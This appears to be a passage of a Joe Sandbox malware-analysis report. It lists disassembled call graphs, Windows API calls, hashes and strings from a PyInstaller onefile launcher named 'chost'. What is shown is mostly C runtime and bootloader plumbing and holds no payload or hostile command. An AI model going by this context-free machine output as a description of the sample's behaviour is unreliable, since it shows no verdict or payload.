19303->19302 19306 7ff69437a9b8 __free_lconv_mon 11 API calls 19303->19306 19304 7ff69437a9b8 __free_lconv_mon 11 API calls 19304->19292 19307 7ff6943793fa 19305->19307 19306->19303 19309 7ff69437b2a5 FlsGetValue 19308->19309 19310 7ff69437b2c0 FlsSetValue 19308->19310 19311 7ff69437b2ba 19309->19311 19326 7ff69437b2b2 19309->19326 19312 7ff69437b2cd 19310->19312 19310->19326 19311->19310 19315 7ff69437ec08 memcpy_s 11 API calls 19312->19315 19313 7ff69437b2b8 19328 7ff694382334 19313->19328 19314 7ff69437a574 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19316 7ff69437b335 19314->19316 19317 7ff69437b2dc 19315->19317 19318 7ff69437b2fa FlsSetValue 19317->19318 19319 7ff69437b2ea FlsSetValue 19317->19319 19321 7ff69437b318 19318->19321 19322 7ff69437b306 FlsSetValue 19318->19322 19320 7ff69437b2f3 19319->19320 19324 7ff69437a9b8 __free_lconv_mon 11 API calls 19320->19324 19323 7ff69437af64 memcpy_s 11 API calls 19321->19323 19322->19320 19325 7ff69437b320 19323->19325 19324->19326 19327 7ff69437a9b8 __free_lconv_mon 11 API calls 19325->19327 19326->19313 19326->19314 19327->19313 19351 7ff6943825a4 19328->19351 19330 7ff694382369 19366 7ff694382034 19330->19366 19333 7ff69437d66c _fread_nolock 12 API calls 19334 7ff694382397 19333->19334 19335 7ff69438239f 19334->19335 19337 7ff6943823ae 19334->19337 19336 7ff69437a9b8 __free_lconv_mon 11 API calls 19335->19336 19350 7ff694382386 19336->19350 19337->19337 19373 7ff6943826dc 19337->19373 19340 7ff6943824aa 19341 7ff694374f78 memcpy_s 11 API calls 19340->19341 19342 7ff6943824af 19341->19342 19346 7ff69437a9b8 __free_lconv_mon 11 API calls 19342->19346 19343 7ff694382505 19345 7ff69438256c 19343->19345 19384 7ff694381e64 19343->19384 19344 7ff6943824c4 19344->19343 19347 7ff69437a9b8 __free_lconv_mon 11 API calls 19344->19347 19349 7ff69437a9b8 __free_lconv_mon 11 API calls 19345->19349 19346->19350 19347->19343 19349->19350 19350->19265 19352 7ff6943825c7 19351->19352 19353 7ff6943825d1 19352->19353 19399 7ff694380348 EnterCriticalSection 19352->19399 19356 7ff694382643 19353->19356 19358 7ff69437a574 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19353->19358 19356->19330 19359 7ff69438265b 19358->19359 19362 7ff69437b294 50 API calls 19359->19362 19365 7ff6943826b2 19359->19365 19363 7ff69438269c 19362->19363 19364 7ff694382334 65 API calls 19363->19364 19364->19365 19365->19330 19367 7ff694374fbc 45 API calls 19366->19367 19368 7ff694382048 19367->19368 19369 7ff694382066 19368->19369 19370 7ff694382054 GetOEMCP 19368->19370 19371 7ff69438207b 19369->19371 19372 7ff69438206b GetACP 19369->19372 19370->19371 19371->19333 19371->19350 19372->19371 19374 7ff694382034 47 API calls 19373->19374 19375 7ff694382709 19374->19375 19376 7ff69438285f 19375->19376 19377 7ff694382746 IsValidCodePage 19375->19377 19383 7ff694382760 memcpy_s 19375->19383 19378 7ff69436c5c0 _log10_special 8 API calls 19376->19378 19377->19376 19380 7ff694382757 19377->19380 19379 7ff6943824a1 19378->19379 19379->19340 19379->19344 19381 7ff694382786 GetCPInfo 19380->19381 19380->19383 19381->19376 19381->19383 19400 7ff69438214c 19383->19400 19466 7ff694380348 EnterCriticalSection 19384->19466 19401 7ff694382189 GetCPInfo 19400->19401 19402 7ff69438227f 19400->19402 19401->19402 19408 7ff69438219c 19401->19408 19403 7ff69436c5c0 _log10_special 8 API calls 19402->19403 19404 7ff69438231e 19403->19404 19404->19376 19405 7ff694382eb0 48 API calls 19406 7ff694382213 19405->19406 19411 7ff694387bf4 19406->19411 19408->19405 19410 7ff694387bf4 54 API calls 19410->19402 19412 7ff694374fbc 45 API calls 19411->19412 19413 7ff694387c19 19412->19413 19416 7ff6943878c0 19413->19416 19417 7ff694387901 19416->19417 19418 7ff69437f910 _fread_nolock MultiByteToWideChar 19417->19418 19421 7ff69438794b 19418->19421 19419 7ff694387bc9 19420 7ff69436c5c0 _log10_special 8 API calls 19419->19420 19422 7ff694382246 19420->19422 19421->19419 19423 7ff69437d66c _fread_nolock 12 API calls 19421->19423 19424 7ff694387a81 19421->19424 19426 7ff694387983 19421->19426 19422->19410 19423->19426 19424->19419 19425 7ff69437a9b8 __free_lconv_mon 11 API calls 19424->19425 19425->19419 19426->19424 19427 7ff69437f910 _fread_nolock MultiByteToWideChar 19426->19427 19428 7ff6943879f6 19427->19428 19428->19424 19447 7ff69437f154 19428->19447 19431 7ff694387a92 19433 7ff69437d66c _fread_nolock 12 API calls 19431->19433 19435 7ff694387b64 19431->19435 19437 7ff694387ab0 19431->19437 19432 7ff694387a41 19432->19424 19434 7ff69437f154 __crtLCMapStringW 6 API calls 19432->19434 19433->19437 19434->19424 19435->19424 19436 7ff69437a9b8 __free_lconv_mon 11 API calls 19435->19436 19436->19424 19437->19424 19438 7ff69437f154 __crtLCMapStringW 6 API calls 19437->19438 19439 7ff694387b30 19438->19439 19439->19435 19440 7ff694387b66 19439->19440 19441 7ff694387b50 19439->19441 19442 7ff694380858 WideCharToMultiByte 19440->19442 19443 7ff694380858 WideCharToMultiByte 19441->19443 19444 7ff694387b5e 19442->19444 19443->19444 19444->19435 19445 7ff694387b7e 19444->19445 19445->19424 19446 7ff69437a9b8 __free_lconv_mon 11 API calls 19445->19446 19446->19424 19453 7ff69437ed80 19447->19453 19450 7ff69437f19a 19450->19424 19450->19431 19450->19432 19452 7ff69437f203 LCMapStringW 19452->19450 19454 7ff69437eddd 19453->19454 19461 7ff69437edd8 __vcrt_InitializeCriticalSectionEx 19453->19461 19454->19450 19463 7ff69437f240 19454->19463 19455 7ff69437ee0d LoadLibraryExW 19457 7ff69437eee2 19455->19457 19458 7ff69437ee32 GetLastError 19455->19458 19456 7ff69437ef02 GetProcAddress 19456->19454 19460 7ff69437ef13 19456->19460 19457->19456 19459 7ff69437eef9 FreeLibrary 19457->19459 19458->19461 19459->19456 19460->19454 19461->19454 19461->19455 19461->19456 19462 7ff69437ee6c LoadLibraryExW 19461->19462 19462->19457 19462->19461 19464 7ff69437ed80 __crtLCMapStringW 5 API calls 19463->19464 19465 7ff69437f26e __crtLCMapStringW 19464->19465 19465->19452 19468 7ff6943793b9 19467->19468 19469 7ff69437951d 19467->19469 19468->19304 19470 7ff694379546 19469->19470 19471 7ff69437a9b8 __free_lconv_mon 11 API calls 19469->19471 19472 7ff69437a9b8 __free_lconv_mon 11 API calls 19470->19472 19471->19469 19472->19468 19474 7ff694386348 19473->19474 19475 7ff694386331 19473->19475 19474->19475 19478 7ff694386356 19474->19478 19476 7ff694374f78 memcpy_s 11 API calls 19475->19476 19477 7ff694386336 19476->19477 19479 7ff69437a950 _invalid_parameter_noinfo 37 API calls 19477->19479 19480 7ff694374fbc 45 API calls 19478->19480 19481 7ff694386341 19478->19481 19479->19481 19480->19481 19481->19139 19483 7ff694374fbc 45 API calls 19482->19483 19484 7ff694388fe1 19483->19484 19487 7ff694388c38 19484->19487 19489 7ff694388c86 19487->19489 19488 7ff69436c5c0 _log10_special 8 API calls 19490 7ff694387275 19488->19490 19491 7ff694388d0d 19489->19491 19493 7ff694388cf8 GetCPInfo 19489->19493 19496 7ff694388d11 19489->19496 19490->19139 19490->19166 19492 7ff69437f910 _fread_nolock MultiByteToWideChar 19491->19492 19491->19496 19494 7ff694388da5 19492->19494 19493->19491 19493->19496 19495 7ff69437d66c _fread_nolock 12 API calls 19494->19495 19494->19496 19497 7ff694388ddc 19494->19497 19495->19497 19496->19488 19497->19496 19498 7ff69437f910 _fread_nolock MultiByteToWideChar 19497->19498 19499 7ff694388e4a 19498->19499 19500 7ff694388f2c 19499->19500 19501 7ff69437f910 _fread_nolock MultiByteToWideChar 19499->19501 19500->19496 19502 7ff69437a9b8 __free_lconv_mon 11 API calls 19500->19502 19503 7ff694388e70 19501->19503 19502->19496 19503->19500 19504 7ff69437d66c _fread_nolock 12 API calls 19503->19504 19505 7ff694388e9d 19503->19505 19504->19505 19505->19500 19506 7ff69437f910 _fread_nolock MultiByteToWideChar 19505->19506 19507 7ff694388f14 19506->19507 19508 7ff694388f34 19507->19508 19509 7ff694388f1a 19507->19509 19516 7ff69437efd8 19508->19516 19509->19500 19511 7ff69437a9b8 __free_lconv_mon 11 API calls 19509->19511 19511->19500 19513 7ff694388f73 19513->19496 19515 7ff69437a9b8 __free_lconv_mon 11 API calls 19513->19515 19514 7ff69437a9b8 __free_lconv_mon 11 API calls 19514->19513 19515->19496 19517 7ff69437ed80 __crtLCMapStringW 5 API calls 19516->19517 19518 7ff69437f016 19517->19518 19519 7ff69437f240 __crtLCMapStringW 5 API calls 19518->19519 19521 7ff69437f01e 19518->19521 19520 7ff69437f087 CompareStringW 19519->19520 19520->19521 19521->19513 19521->19514 19523 7ff694387cca HeapSize 19522->19523 19524 7ff694387cb1 19522->19524 19525 7ff694374f78 memcpy_s 11 API calls 19524->19525 19526 7ff694387cb6 19525->19526 19527 7ff69437a950 _invalid_parameter_noinfo 37 API calls 19526->19527 19528 7ff694387cc1 19527->19528 19528->19173 19530 7ff694387cf9 19529->19530 19531 7ff694387d03 19529->19531 19532 7ff69437d66c _fread_nolock 12 API calls 19530->19532 19533 7ff694387d08 19531->19533 19539 7ff694387d0f memcpy_s 19531->19539 19537 7ff694387d01 19532->19537 19534 7ff69437a9b8 __free_lconv_mon 11 API calls 19533->19534 19534->19537 19535 7ff694387d15 19538 7ff694374f78 memcpy_s 11 API calls 19535->19538 19536 7ff694387d42 HeapReAlloc 19536->19537 19536->19539 19537->19175 19538->19537 19539->19535 19539->19536 19540 7ff694383600 memcpy_s 2 API calls 19539->19540 19540->19539 19542 7ff69437ed80 __crtLCMapStringW 5 API calls 19541->19542 19543 7ff69437efb4 19542->19543 19543->19179 19545 7ff69437556a 19544->19545 19546 7ff694375546 19544->19546 19547 7ff6943755c4 19545->19547 19548 7ff69437556f 19545->19548 19550 7ff69437a9b8 __free_lconv_mon 11 API calls 19546->19550 19554 7ff694375555 19546->19554 19549 7ff69437f910 _fread_nolock MultiByteToWideChar 19547->19549 19551 7ff694375584 19548->19551 19548->19554 19555 7ff69437a9b8 __free_lconv_mon 11 API calls 19548->19555 19560 7ff6943755e0 19549->19560 19550->19554 19552 7ff69437d66c _fread_nolock 12 API calls 19551->19552 19552->19554 19553 7ff6943755e7 GetLastError 19556 7ff694374eec _fread_nolock 11 API calls 19553->19556 19554->19183 19554->19184 19555->19551 19559 7ff6943755f4 19556->19559 19557 7ff694375622 19557->19554 19558 7ff69437f910 _fread_nolock MultiByteToWideChar 19557->19558 19564 7ff694375666 19558->19564 19565 7ff694374f78 memcpy_s 11 API calls 19559->19565 19560->19553 19560->19557 19561 7ff694375615 19560->19561 19562 7ff69437a9b8 __free_lconv_mon 11 API calls 19560->19562 19563 7ff69437d66c _fread_nolock 12 API calls 19561->19563 19562->19561 19563->19557 19564->19553 19564->19554 19565->19554 19567 7ff694379295 19566->19567 19568 7ff694379291 19566->19568 19587 7ff694382aac GetEnvironmentStringsW 19567->19587 19568->19215 19579 7ff69437963c 19568->19579 19571 7ff6943792a2 19573 7ff69437a9b8 __free_lconv_mon 11 API calls 19571->19573 19572 7ff6943792ae 19594 7ff6943793fc 19572->19594 19573->19568 19576 7ff69437a9b8 __free_lconv_mon 11 API calls 19577 7ff6943792d5 19576->19577 19578 7ff69437a9b8 __free_lconv_mon 11 API calls 19577->19578 19578->19568 19580 7ff69437965f 19579->19580 19585 7ff694379676 19579->19585 19580->19215 19581 7ff69437ec08 memcpy_s 11 API calls 19581->19585 19582 7ff6943796ea 19584 7ff69437a9b8 __free_lconv_mon 11 API calls 19582->19584 19583 7ff69437f910 MultiByteToWideChar _fread_nolock 19583->19585 19584->19580 19585->19580 19585->19581 19585->19582 19585->19583 19586 7ff69437a9b8 __free_lconv_mon 11 API calls 19585->19586 19586->19585 19588 7ff69437929a 19587->19588 19590 7ff694382ad0 19587->19590 19588->19571 19588->19572 19589 7ff69437d66c _fread_nolock 12 API calls 19591 7ff694382b07 memcpy_s 19589->19591 19590->19589 19592 7ff69437a9b8 __free_lconv_mon 11 API calls 19591->19592 19593 7ff694382b27 FreeEnvironmentStringsW 19592->19593 19593->19588 19595 7ff694379424 19594->19595 19596 7ff69437ec08 memcpy_s 11 API calls 19595->19596 19601 7ff69437945f 19596->19601 19597 7ff69437a9b8 __free_lconv_mon 11 API calls 19598 7ff6943792b6 19597->19598 19598->19576 19599 7ff6943794e1 19600 7ff69437a9b8 __free_lconv_mon 11 API calls 19599->19600 19600->19598 19601->19599 19602 7ff69437ec08 memcpy_s 11 API calls 19601->19602 19603 7ff6943794d0 19601->19603 19605 7ff6943804e4 37 API calls 19601->19605 19608 7ff694379504 19601->19608 19609 7ff694379467 19601->19609 19611 7ff69437a9b8 __free_lconv_mon 11 API calls 19601->19611 19602->19601 19604 7ff694379518 11 API calls 19603->19604 19606 7ff6943794d8 19604->19606 19605->19601 19607 7ff69437a9b8 __free_lconv_mon 11 API calls 19606->19607 19607->19609 19610 7ff69437a970 _isindst 17 API calls 19608->19610 19609->19597 19612 7ff694379516 19610->19612 19611->19601 19615 7ff694388ba1 __crtLCMapStringW 19613->19615 19614 7ff69438715e 19614->19238 19614->19239 19615->19614 19616 7ff69437efd8 6 API calls 19615->19616 19616->19614 19900 7ff69436cbc0 19901 7ff69436cbd0 19900->19901 19917 7ff694379c18 19901->19917 19903 7ff69436cbdc 19923 7ff69436ceb8 19903->19923 19905 7ff69436d19c 7 API calls 19907 7ff69436cc75 19905->19907 19906 7ff69436cbf4 _RTC_Initialize 19915 7ff69436cc49 19906->19915 19928 7ff69436d068 19906->19928 19909 7ff69436cc09 19931 7ff694379084 19909->19931 19915->19905 19916 7ff69436cc65 19915->19916 19918 7ff694379c29 19917->19918 19919 7ff694374f78 memcpy_s 11 API calls 19918->19919 19920 7ff694379c31 19918->19920 19921 7ff694379c40 19919->19921 19920->19903 19922 7ff69437a950 _invalid_parameter_noinfo 37 API calls 19921->19922 19922->19920 19924 7ff69436cec9 19923->19924 19927 7ff69436cece __scrt_release_startup_lock 19923->19927 19925 7ff69436d19c 7 API calls 19924->19925 19924->19927 19926 7ff69436cf42 19925->19926 19927->19906 19956 7ff69436d02c 19928->19956 19930 7ff69436d071 19930->19909 19932 7ff6943790a4 19931->19932 19938 7ff69436cc15 19931->19938 19933 7ff6943790ac 19932->19933 19934 7ff6943790c2 GetModuleFileNameW 19932->19934 19935 7ff694374f78 memcpy_s 11 API calls 19933->19935 19939 7ff6943790ed 19934->19939 19936 7ff6943790b1 19935->19936 19937 7ff69437a950 _invalid_parameter_noinfo 37 API calls 19936->19937 19937->19938 19938->19915 19955 7ff69436d13c InitializeSListHead 19938->19955 19971 7ff694379024 19939->19971 19942 7ff694379135 19943 7ff694374f78 memcpy_s 11 API calls 19942->19943 19944 7ff69437913a 19943->19944 19945 7ff69437a9b8 __free_lconv_mon 11 API calls 19944->19945 19945->19938 19946 7ff69437914d 19947 7ff69437916f 19946->19947 19949 7ff69437919b 19946->19949 19950 7ff6943791b4 19946->19950 19948 7ff69437a9b8 __free_lconv_mon 11 API calls 19947->19948 19948->19938 19951 7ff69437a9b8 __free_lconv_mon 11 API calls 19949->19951 19952 7ff69437a9b8 __free_lconv_mon 11 API calls 19950->19952 19953 7ff6943791a4 19951->19953 19952->19947 19954 7ff69437a9b8 __free_lconv_mon 11 API calls 19953->19954 19954->19938 19957 7ff69436d046 19956->19957 19959 7ff69436d03f 19956->19959 19960 7ff69437a25c 19957->19960 19959->19930 19963 7ff694379e98 19960->19963 19970 7ff694380348 EnterCriticalSection 19963->19970 19972 7ff694379074 19971->19972 19973 7ff69437903c 19971->19973 19972->19942 19972->19946 19973->19972 19974 7ff69437ec08 memcpy_s 11 API calls 19973->19974 19975 7ff69437906a 19974->19975 19976 7ff69437a9b8 __free_lconv_mon 11 API calls 19975->19976 19976->19972 19980 7ff694379dc0 19983 7ff694379d3c 19980->19983 19990 7ff694380348 EnterCriticalSection 19983->19990 20251 7ff69437b040 20252 7ff69437b045 20251->20252 20256 7ff69437b05a 20251->20256 20257 7ff69437b060 20252->20257 20258 7ff69437b0a2 20257->20258 20261 7ff69437b0aa 20257->20261 20259 7ff69437a9b8 __free_lconv_mon 11 API calls 20258->20259 20259->20261 20260 7ff69437a9b8 __free_lconv_mon 11 API calls 20262 7ff69437b0b7 20260->20262 20261->20260 20263 7ff69437a9b8 __free_lconv_mon 11 API calls 20262->20263 20264 7ff69437b0c4 20263->20264 20265 7ff69437a9b8 __free_lconv_mon 11 API calls 20264->20265 20266 7ff69437b0d1 20265->20266 20267 7ff69437a9b8 __free_lconv_mon 11 API calls 20266->20267 20268 7ff69437b0de 20267->20268 20269 7ff69437a9b8 __free_lconv_mon 11 API calls 20268->20269 20270 7ff69437b0eb 20269->20270 20271 7ff69437a9b8 __free_lconv_mon 11 API calls 20270->20271 20272 7ff69437b0f8 20271->20272 20273 7ff69437a9b8 __free_lconv_mon 11 API calls 20272->20273 20274 7ff69437b105 20273->20274 20275 7ff69437a9b8 __free_lconv_mon 11 API calls 20274->20275 20276 7ff69437b115 20275->20276 20277 7ff69437a9b8 __free_lconv_mon 11 API calls 20276->20277 20278 7ff69437b125 20277->20278 20283 7ff69437af04 20278->20283 20297 7ff694380348 EnterCriticalSection 20283->20297 20299 7ff69438ac53 20300 7ff69438ac63 20299->20300 20303 7ff6943754e8 LeaveCriticalSection 20300->20303 19617 7ff69436bb50 19618 7ff69436bb7e 19617->19618 19619 7ff69436bb65 19617->19619 19619->19618 19621 7ff69437d66c 12 API calls 19619->19621 19620 7ff69436bbde 19621->19620 19622 7ff6943799d1 19623 7ff69437a448 45 API calls 19622->19623 19624 7ff6943799d6 19623->19624 19625 7ff6943799fd GetModuleHandleW 19624->19625 19626 7ff694379a47 19624->19626 19625->19626 19632 7ff694379a0a 19625->19632 19634 7ff6943798d4 19626->19634 19632->19626 19648 7ff694379af8 GetModuleHandleExW 19632->19648 19654 7ff694380348 EnterCriticalSection 19634->19654 19649 7ff694379b2c GetProcAddress 19648->19649 19650 7ff694379b55 19648->19650 19651 7ff694379b3e 19649->19651 19652 7ff694379b5a FreeLibrary 19650->19652 19653 7ff694379b61 19650->19653 19651->19650 19652->19653 19653->19626 20032 7ff69438add9 20035 7ff6943754e8 LeaveCriticalSection 20032->20035 20305 7ff69438ae6e 20306 7ff69438ae87 20305->20306 20307 7ff69438ae7d 20305->20307 20309 7ff6943803a8 LeaveCriticalSection 20307->20309

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 0 7ff694368bd0-7ff694368d16 call 7ff69436c8c0 call 7ff694369400 SetConsoleCtrlHandler GetStartupInfoW call 7ff694375460 call 7ff69437a4ec call 7ff69437878c call 7ff694375460 call 7ff69437a4ec call 7ff69437878c call 7ff694375460 call 7ff69437a4ec call 7ff69437878c GetCommandLineW CreateProcessW 23 7ff694368d3d-7ff694368d79 RegisterClassW 0->23 24 7ff694368d18-7ff694368d38 GetLastError call 7ff694362c50 0->24 25 7ff694368d7b GetLastError 23->25 26 7ff694368d81-7ff694368dd5 CreateWindowExW 23->26 32 7ff694369029-7ff69436904f call 7ff69436c5c0 24->32 25->26 28 7ff694368dd7-7ff694368ddd GetLastError 26->28 29 7ff694368ddf-7ff694368de4 ShowWindow 26->29 31 7ff694368dea-7ff694368dfa WaitForSingleObject 28->31 29->31 34 7ff694368dfc 31->34 35 7ff694368e78-7ff694368e7f 31->35 37 7ff694368e00-7ff694368e03 34->37 38 7ff694368ec2-7ff694368ec9 35->38 39 7ff694368e81-7ff694368e91 WaitForSingleObject 35->39 42 7ff694368e0b-7ff694368e12 37->42 43 7ff694368e05 GetLastError 37->43 40 7ff694368fb0-7ff694368fc9 GetMessageW 38->40 41 7ff694368ecf-7ff694368ee5 QueryPerformanceFrequency QueryPerformanceCounter 38->41 44 7ff694368fe8-7ff694368ff2 39->44 45 7ff694368e97-7ff694368ea7 TerminateProcess 39->45 48 7ff694368fcb-7ff694368fd9 TranslateMessage DispatchMessageW 40->48 49 7ff694368fdf-7ff694368fe6 40->49 46 7ff694368ef0-7ff694368f28 MsgWaitForMultipleObjects PeekMessageW 41->46 42->39 47 7ff694368e14-7ff694368e31 PeekMessageW 42->47 43->42 50 7ff694368ff4-7ff694368ffa DestroyWindow 44->50 51 7ff694369001-7ff694369025 GetExitCodeProcess CloseHandle * 2 44->51 52 7ff694368ea9 GetLastError 45->52 53 7ff694368eaf-7ff694368ebd WaitForSingleObject 45->53 54 7ff694368f2a 46->54 55 7ff694368f63-7ff694368f6a 46->55 56 7ff694368e66-7ff694368e76 WaitForSingleObject 47->56 57 7ff694368e33-7ff694368e64 TranslateMessage DispatchMessageW PeekMessageW 47->57 48->49 49->40 49->44 50->51 51->32 52->53 53->44 58 7ff694368f30-7ff694368f61 TranslateMessage DispatchMessageW PeekMessageW 54->58 55->40 59 7ff694368f6c-7ff694368f95 QueryPerformanceCounter 55->59 56->35 56->37 57->56 57->57 58->55 58->58 59->46 60 7ff694368f9b-7ff694368fa2 59->60 60->44 61 7ff694368fa4-7ff694368fa8 60->61 61->40
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                        • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                        • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                        • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                        • Instruction ID: 2f78c17e8f6663816fc82164a7c7165028fca91e9fed9c9ce818c0f85e2fa460
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 12D17231A09A8386E7208F36E8952AD7760FF84B58F508279EA5DC7BA9DF3CD145C700

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 62 7ff694361000-7ff694363806 call 7ff69436fe88 call 7ff69436fe90 call 7ff69436c8c0 call 7ff694375460 call 7ff6943754f4 call 7ff6943636b0 76 7ff694363808-7ff69436380f 62->76 77 7ff694363814-7ff694363836 call 7ff694361950 62->77 78 7ff694363c97-7ff694363cb2 call 7ff69436c5c0 76->78 82 7ff69436391b-7ff694363931 call 7ff6943645b0 77->82 83 7ff69436383c-7ff694363856 call 7ff694361c80 77->83 90 7ff69436396a-7ff69436397f call 7ff694362710 82->90 91 7ff694363933-7ff694363960 call 7ff694367f80 82->91 87 7ff69436385b-7ff69436389b call 7ff694368a20 83->87 96 7ff69436389d-7ff6943638a3 87->96 97 7ff6943638c1-7ff6943638cc call 7ff694374fa0 87->97 99 7ff694363c8f 90->99 103 7ff694363962-7ff694363965 call 7ff6943700bc 91->103 104 7ff694363984-7ff6943639a6 call 7ff694361c80 91->104 100 7ff6943638a5-7ff6943638ad 96->100 101 7ff6943638af-7ff6943638bd call 7ff694368b90 96->101 111 7ff6943639fc-7ff694363a2a call 7ff694368b30 call 7ff694368b90 * 3 97->111 112 7ff6943638d2-7ff6943638e1 call 7ff694368a20 97->112 99->78 100->101 101->97 103->90 113 7ff6943639b0-7ff6943639b9 104->113 138 7ff694363a2f-7ff694363a3e call 7ff694368a20 111->138 119 7ff6943638e7-7ff6943638ed 112->119 120 7ff6943639f4-7ff6943639f7 call 7ff694374fa0 112->120 113->113 117 7ff6943639bb-7ff6943639d8 call 7ff694361950 113->117 117->87 130 7ff6943639de-7ff6943639ef call 7ff694362710 117->130 123 7ff6943638f0-7ff6943638fc 119->123 120->111 127 7ff694363905-7ff694363908 123->127 128 7ff6943638fe-7ff694363903 123->128 127->120 131 7ff69436390e-7ff694363916 call 7ff694374fa0 127->131 128->123 128->127 130->99 131->138 141 7ff694363b45-7ff694363b53 138->141 142 7ff694363a44-7ff694363a47 138->142 143 7ff694363a67 141->143 144 7ff694363b59-7ff694363b5d 141->144 142->141 145 7ff694363a4d-7ff694363a50 142->145 146 7ff694363a6b-7ff694363a90 call 7ff694374fa0 143->146 144->146 147 7ff694363a56-7ff694363a5a 145->147 148 7ff694363b14-7ff694363b17 145->148 157 7ff694363aab-7ff694363ac0 146->157 158 7ff694363a92-7ff694363aa6 call 7ff694368b30 146->158 147->148 149 7ff694363a60 147->149 150 7ff694363b19-7ff694363b1d 148->150 151 7ff694363b2f-7ff694363b40 call 7ff694362710 148->151 149->143 150->151 155 7ff694363b1f-7ff694363b2a 150->155 159 7ff694363c7f-7ff694363c87 151->159 155->146 161 7ff694363ac6-7ff694363aca 157->161 162 7ff694363be8-7ff694363bfa call 7ff694368a20 157->162 158->157 159->99 164 7ff694363bcd-7ff694363be2 call 7ff694361940 161->164 165 7ff694363ad0-7ff694363ae8 call 7ff6943752c0 161->165 170 7ff694363bfc-7ff694363c02 162->170 171 7ff694363c2e 162->171 164->161 164->162 175 7ff694363aea-7ff694363b02 call 7ff6943752c0 165->175 176 7ff694363b62-7ff694363b7a call 7ff6943752c0 165->176 173 7ff694363c04-7ff694363c1c 170->173 174 7ff694363c1e-7ff694363c2c 170->174 177 7ff694363c31-7ff694363c40 call 7ff694374fa0 171->177 173->177 174->177 175->164 186 7ff694363b08-7ff694363b0f 175->186 184 7ff694363b7c-7ff694363b80 176->184 185 7ff694363b87-7ff694363b9f call 7ff6943752c0 176->185 187 7ff694363c46-7ff694363c4a 177->187 188 7ff694363d41-7ff694363d63 call 7ff6943644d0 177->188 184->185 201 7ff694363bac-7ff694363bc4 call 7ff6943752c0 185->201 202 7ff694363ba1-7ff694363ba5 185->202 186->164 191 7ff694363cd4-7ff694363ce6 call 7ff694368a20 187->191 192 7ff694363c50-7ff694363c5f call 7ff6943690e0 187->192 199 7ff694363d65-7ff694363d6f call 7ff694364620 188->199 200 7ff694363d71-7ff694363d82 call 7ff694361c80 188->200 205 7ff694363ce8-7ff694363ceb 191->205 206 7ff694363d35-7ff694363d3c 191->206 203 7ff694363cb3-7ff694363cb6 call 7ff694368850 192->203 204 7ff694363c61 192->204 213 7ff694363d87-7ff694363d96 199->213 200->213 201->164 221 7ff694363bc6 201->221 202->201 220 7ff694363cbb-7ff694363cbd 203->220 210 7ff694363c68 call 7ff694362710 204->210 205->206 211 7ff694363ced-7ff694363d10 call 7ff694361c80 205->211 206->210 222 7ff694363c6d-7ff694363c77 210->222 228 7ff694363d2b-7ff694363d33 call 7ff694374fa0 211->228 229 7ff694363d12-7ff694363d26 call 7ff694362710 call 7ff694374fa0 211->229 218 7ff694363d98-7ff694363d9f 213->218 219 7ff694363dc4-7ff694363dda call 7ff694369400 213->219 218->219 224 7ff694363da1-7ff694363da5 218->224 234 7ff694363ddc 219->234 235 7ff694363de8-7ff694363e04 SetDllDirectoryW 219->235 226 7ff694363cc8-7ff694363ccf 220->226 227 7ff694363cbf-7ff694363cc6 220->227 221->164 222->159 224->219 230 7ff694363da7-7ff694363dbe SetDllDirectoryW LoadLibraryExW 224->230 226->213 227->210 228->213 229->222 230->219 234->235 236 7ff694363e0a-7ff694363e19 call 7ff694368a20 235->236 237 7ff694363f01-7ff694363f08 235->237 250 7ff694363e1b-7ff694363e21 236->250 251 7ff694363e32-7ff694363e3c call 7ff694374fa0 236->251 242 7ff694363ffc-7ff694364004 237->242 243 7ff694363f0e-7ff694363f15 237->243 247 7ff694364006-7ff694364023 PostMessageW GetMessageW 242->247 248 7ff694364029-7ff69436405b call 7ff6943636a0 call 7ff694363360 call 7ff694363670 call 7ff694366fb0 call 7ff694366d60 242->248 243->242 246 7ff694363f1b-7ff694363f25 call 7ff6943633c0 243->246 246->222 258 7ff694363f2b-7ff694363f3f call 7ff6943690c0 246->258 247->248 254 7ff694363e2d-7ff694363e2f 250->254 255 7ff694363e23-7ff694363e2b 250->255 263 7ff694363ef2-7ff694363efc call 7ff694368b30 251->263 264 7ff694363e42-7ff694363e48 251->264 254->251 255->254 269 7ff694363f64-7ff694363fa0 call 